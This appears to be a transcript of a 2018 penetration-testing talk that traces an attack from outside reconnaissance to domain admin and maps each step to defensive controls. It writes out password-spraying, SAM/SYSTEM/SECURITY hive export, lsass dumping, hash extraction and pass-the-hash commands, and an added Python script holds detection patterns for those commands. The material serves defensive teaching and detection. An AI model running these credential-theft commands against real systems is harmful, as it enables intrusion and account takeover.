

Stealing Domain Admin (or How I Learned to Stop Worrying and Love the CSSF)

With global information security spending rapidly approaching $100 billion, you'd think we'd have a pretty good handle on preventing data breaches by now. However, considering that nearly 1 billion records have been exposed in the 5000+ data breaches publicly disclosed since 2005, you're probably asking yourself the same question as security and risk management professionals all over the world: How does this keep happening? This presentation will walk you through a penetration tester's process, step-by-step, as the tester goes from unauthorized outsider to domain admin (without being detected). More importantly, we'll discuss the fundamental security controls that will shut down attackers time and again.

slandail

March 07, 2018


Transcript

  1. WHO AM I?
     - Jerod Brennen
     - Security Solutions Architect, One Identity
     - Alphabet Soup: ACE, CISSP, GWAPT, GWEB
  2. TEN EIGHT STEP PROGRAM
     - Step 1: Gather OSINT
     - Step 2: Score Some Creds
     - Step 3: Logon to an Internal System
     - Step 4: Dump SAM/System/Security Hives
     - Step 5: Extract Hashes and Get Cracking
     - Step 6: Identify Admin Accounts
     - Step 7: Find Active DA Logins
     - Step 8: Pass the Hash
  3. STEP 1: GATHER OSINT (OPEN SOURCE INTELLIGENCE)
     - Google search: site:company_website.com "contact"
     - Maltego: https://www.paterva.com/ (Transform: To Email Address [using Search Engine])
     - LinkedIn company search
     - Data.com Connect: https://connect.data.com/
     - EmailHarvester: https://github.com/maldevel/EmailHarvester
     - Discover (Lee Baird): https://github.com/leebaird/discover
  4. STEP 2: SCORE SOME CREDS
     - Brute Force Attack: lots of usernames, lots of passwords
     - Password Spray Attack: lots of usernames, VERY few passwords
       ./ntlm-botherer.py -U ./users.txt -p Winter2018 -d target_domain.com https://webdir2a.online.lync.com/Autodiscover/AutodiscoverService.svc/root/oauth/user?originalDomain=target_domain.com/WebTicket/WebTicketService.svc
     - Burp Suite Intruder / Cluster Bomb
       - https://portswigger.net/burp/help/intruder_using.html
       - https://portswigger.net/burp/help/intruder_positions.html
     - MailSniper: https://github.com/dafthack/MailSniper
  5. STEP 3: LOGON TO AN INTERNAL SYSTEM
     - Passive Intel
       - Shodan - https://shodan.io/
       - Censys - https://censys.io/
       - Search Engines: site:company.com inurl:login, site:company.com sitemap.xml
     - Active Intel: nmap -Pn -sS xxx.xxx.xxx.0/24 -p 21-23,80,443,3389,5800,5900,8443
     - Remote Administration Tools: Bomgar, GoToMeeting, TeamViewer, Join.me, Splashtop, LogMeIn, WebEx
     - Physical/Wireless Network Access
  6. STEP 4: DUMP SAM/SYSTEM/SECURITY HIVES
     - Dump the hives
       - reg.exe save hklm\sam c:\sam.save
       - reg.exe save hklm\system c:\system.save
       - reg.exe save hklm\security c:\security.save
       - This one may require elevated privileges
       - If so, psexec.exe -i -s cmd.exe, then execute within new command prompt window
     - While you're there, scope out users & groups
       - net user /domain > domain_users.txt
       - net groups /domain > domain_groups.txt
     - Exfiltrate: Box, Dropbox, Google Drive, OneDrive, ShareFile
  7. STEP 5: EXTRACT HASHES AND GET CRACKING
     - Extract hashes with Impacket (offline): https://github.com/CoreSecurity/impacket
       - secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
     - Crack SAM hashes
       - LM -> Ophcrack
       - NT -> hashcat or John the Ripper
       - HashKiller: https://hashkiller.co.uk/ntlm-decrypter.aspx
     - Crack domain creds: hashcat or John the Ripper
  8. STEP 6: IDENTIFY ADMIN ACCOUNTS
     - Impacket output: Administrator = RID -500 ("the dash 500 account")
     - Verify Local Admins: net localgroup administrators
     - Dump Active Directory
       - AD Users and Computers
       - Apache Directory Studio
       - Softerra LDAP Administrator/Browser
       - LDAP Admin (portable?)
  9. STEP 7: FIND ACTIVE DA LOGINS
     - PowerShell Empire
       - https://github.com/PowerShellMafia/PowerSploit
       - https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
     - Invoke-UserHunter
       - Input options: individual username, list of usernames, domain group, list of hosts
     - PowerShell ProTip: powershell -exec bypass
  10. STEP 8: PASS THE HASH
     - Invoke-TheHash: https://github.com/Kevin-Robertson/Invoke-TheHash
     - Dump lsass (Local Security Authority Subsystem Service)
       - Start > Run > taskmgr.exe
       - Show processes from all users
       - lsass.exe > Right Click > Dump
       - c:\Users\username\AppData\Local\Temp\lsass.DMP
     - Grab passwords from lsass
       - Online -> procdump.exe: https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
       - Offline -> mimikatz: https://github.com/gentilkiwi/mimikatz
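Steps 4 and 8 come down to a handful of command lines (reg.exe saving the three hives, psexec -s, procdump pointed at lsass, net user /domain), and slide 13 maps them to control S02: centrally store and actively monitor security logs. Those commands are easy to spot in process-creation telemetry once it is collected centrally. The block below is an added example of that detection logic and is my own code, not from the deck or any tool it names. The event layout (a simplified view of Windows Security event 4688 or Sysmon event ID 1: host, user, image, command line), the constructed sample events, the rule names and the patterns are all assumptions.

```python
"""Flag credential-dumping command lines in process-creation telemetry.

Added example (not from the slides). Each event is a constructed,
simplified view of the fields from Windows Security event 4688 or
Sysmon event ID 1 (host, user, image, command line). The rule names
and patterns are assumptions derived from the commands the deck lists
in steps 4 and 8; extend them with what your own telemetry shows.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    image: str
    cmdline: str


# Rule name -> pattern matched against a normalized command line
RULES = [
    # reg.exe save of SAM/SYSTEM/SECURITY (the three hives needed offline)
    ("hive_export",
     r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?:sam|system|security)\b"),
    # procdump aimed at lsass
    ("lsass_dump_procdump", r"\bprocdump(?:64)?(?:\.exe)?\b.*\blsass\b"),
    # psexec -s launching something as SYSTEM
    ("psexec_as_system", r"\bpsexec(?:64)?(?:\.exe)?\b.*\s-s\b"),
    # net user / net group(s) /domain enumeration
    ("domain_enumeration", r"\bnet(?:\.exe)?\s+(?:user|groups?)\s+/domain\b"),
]
COMPILED = [(name, re.compile(pat)) for name, pat in RULES]


def normalize(cmdline):
    """Lower-case, drop quotes and collapse whitespace so that simple
    quoting or spacing variations do not slip past the patterns."""
    return re.sub(r"\s+", " ", cmdline.replace('"', "").replace("'", "")).strip().lower()


def scan(events):
    """Return (host, user, rule) for every rule each event matches."""
    hits = []
    for ev in events:
        cmd = normalize(ev.cmdline)
        for name, rx in COMPILED:
            if rx.search(cmd):
                hits.append((ev.host, ev.user, name))
    return hits


def hosts_with_dump_activity(hits):
    """Hosts where hive or lsass material was taken: triage these first,
    since every credential cached there should be treated as exposed."""
    return sorted({h for h, _, rule in hits if rule in ("hive_export", "lsass_dump_procdump")})


# Constructed sample events, not real telemetry
SAMPLE_EVENTS = [
    ProcEvent("WS01", r"CORP\jdoe", r"C:\Windows\System32\reg.exe", r"reg.exe save hklm\sam c:\sam.save"),
    ProcEvent("WS01", r"CORP\jdoe", r"C:\Windows\System32\reg.exe", r'reg.exe  save "HKEY_LOCAL_MACHINE\SYSTEM" c:\system.save'),
    ProcEvent("WS02", r"CORP\jdoe", r"C:\Tools\PsExec.exe", r"psexec.exe -i -s cmd.exe"),
    ProcEvent("WS02", r"NT AUTHORITY\SYSTEM", r"C:\Tools\procdump.exe", r"procdump.exe -ma lsass.exe lsass.dmp"),
    ProcEvent("WS03", r"CORP\admin", r"C:\Windows\System32\reg.exe", r"reg.exe save hklm\software c:\sw.save"),
    ProcEvent("WS03", r"CORP\admin", r"C:\Windows\System32\net.exe", r"net user /domain"),
]


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for host, user, rule in found:
        print(f"{host} {user}: {rule}")
    print("triage first:", hosts_with_dump_activity(found))
```

On the constructed events the two hive exports on WS01 fire even though one uses the long HKEY_LOCAL_MACHINE form inside quotes, the psexec -s and procdump pair on WS02 fire, and the export of the unrelated SOFTWARE hive on WS03 does not. The point of the sample is that all of this is visible only if 4688 (with command-line auditing enabled) or Sysmon process events reach a central store before the workstation is cleaned up, which is exactly what S02 asks.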
  11. NOTHING NEW UNDER THE SUN
     - Dumping Windows Credentials (December 20, 2013): https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/
     - I Hunt Sys Admins (January 19, 2015): http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
     - Password Spraying Outlook Web Access (February 17, 2016): http://www.blackhillsinfosec.com/?p=4694
  12. COMMON SENSE SECURITY FRAMEWORK
     - Seven (7) Areas of Protection
       - Protect Your Applications
       - Protect Your Endpoints
       - Protect Your Network
       - Protect Your Servers
       - Protect Your Data
       - Protect Your Locations
       - Protect Your People
     - Three (3) Yes/No Questions per Area
     - Guidance (free, open source, commercial): https://commonsenseframework.org/
  13. EVERY BREATH YOU TAKE… EVERY MOVE YOU MAKE…
     Step -> Control
     - Gather OSINT -> S01: Do you follow documented system hardening procedures to secure your servers?
     - Score Some Creds -> D02: Do you periodically review employee account security to ensure that access is appropriate (i.e., least privilege, individual accounts, strong passwords)?
     - Logon to an Internal System -> N03: Do you require two-factor authentication for remote/VPN access, as well as access to third-party (hosted) applications?
     - Dump SAM/System/Security Hives -> S02: Do you centrally store and actively monitor critical security logs for suspicious events (such as abnormal admin account activity)?
     - Extract Hashes and Get Cracking -> See S02
     - Identify Admin Accounts -> E02: Do you limit local administrator account usage?
     - Find Active DA Logins -> See S02
     - Pass the Hash -> See S02
  14. LEADERSHIP NEEDS CONTEXT
     - Information Security Spending Will Top $101 Billion By 2020: http://www.darkreading.com/operations/information-security-spending-will-top-$101-billion-by-2020/d/d-id/1327178
     - World's Biggest Data Breaches: http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
     - Privacy Rights Clearinghouse's Chronology of Data Breaches: https://www.privacyrights.org/data-breaches
     - Verizon Data Breach Investigations Report (DBIR): http://www.verizonenterprise.com/verizon-insights-lab/dbir/
  15. YOUR HOMEWORK
     - Self-assess your organization against the CSSF
     - Schedule a red team / blue team exercise using these steps as a guide
     - Post-mortem the exercise
     - Update policies, procedures, and standards based on the post-mortem
     - Sit down with leadership (steering committee) and share what you learned
     - Fix all the things!
  16. CONTACT INFO
     - Email - [email protected]
     - LinkedIn - https://www.linkedin.com/in/slandail/
     - Twitter - https://twitter.com/slandail
     - GitHub - https://github.com/slandail
     - SlideShare - https://www.slideshare.net/JerodBrennenCISSP
     - Speaker Deck - https://speakerdeck.com/slandail/